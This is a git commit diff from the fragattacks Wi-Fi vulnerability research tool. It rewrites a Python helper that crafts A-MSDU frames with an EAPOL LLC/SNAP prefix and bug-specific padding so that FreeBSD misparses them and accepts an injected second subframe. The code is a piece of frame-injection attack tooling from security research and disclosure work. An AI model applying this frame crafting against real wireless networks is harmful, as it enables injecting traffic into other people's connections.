fragattacks: updated freebsd_create_eapolmsdu

This commit is contained in:
Mathy Vanhoef 2020-05-29 02:37:41 +04:00 committed by Mathy Vanhoef
parent 9e068ad969
commit 75b8ea9c54

View File

@ -39,25 +39,27 @@ def log_level2switch(options):
elif options.debug >= 1: return ["-d", "-K"] elif options.debug >= 1: return ["-d", "-K"]
return ["-K"] return ["-K"]
def freebsd_create_eapolmsdu(src, dst, payload): def freebsd_create_eapolmsdu(src, dst, toinject):
""" """
FreeBSD doesn't properly parse EAPOL/MSDU frames for some reason. FreeBSD doesn't properly parse A-MSDU frames that start with an
It's unclear why. But this code puts the length and addresses at LLC/SNAP header. This is problematic when performing the EAPOL/AMSDU
the right positions so FreeBSD will parse the A-MSDU frame attack. Details why this happens are unclear. To better understand
successfully, so that we can even attack bad implementations. how the frames are parsed, see docs/freebsd_amsdu_bug.odt
""" """
# EAPOL and source address. I don't think the value "\x00\06" is important # Subframe 1: LLC/SNAP for EAPOL. The X's will be part of the first subframe.
rawmac = bytes.fromhex(src.replace(':', '')) rawmac = bytes.fromhex(src.replace(':', ''))
prefix = raw(LLC()/SNAP()/EAPOL()) + b"\x00\x06" + rawmac prefix = raw(LLC()/SNAP()/EAPOL()) + b"XXXXXXXX"
# Length followed by the payload # Subframe 1: content will be the X's (excluding the first 6 bytes). The actual
payload = create_msdu_subframe(src, dst, payload) # ethernet payload length will be payload_len - 16 due to parsing bugs.
payload = prefix + struct.pack(">I", len(payload)) + raw(payload) payload_len = 17
total_len = payload_len + 6 + 6 + 2
padding_len = 4 - (total_len % 4) if total_len % 4 != 0 else 0
payload = prefix + struct.pack(">H", payload_len) + payload_len * b"X" + padding_len * b"Y"
# Put the destination MAC address in the "right" place # Subframe 2: we can now append it normally
rawmac = bytes.fromhex(dst.replace(':', '')) payload += raw(create_msdu_subframe(src, dst, toinject))
payload = payload[:16] + rawmac[:4] + payload[20:]
return payload return payload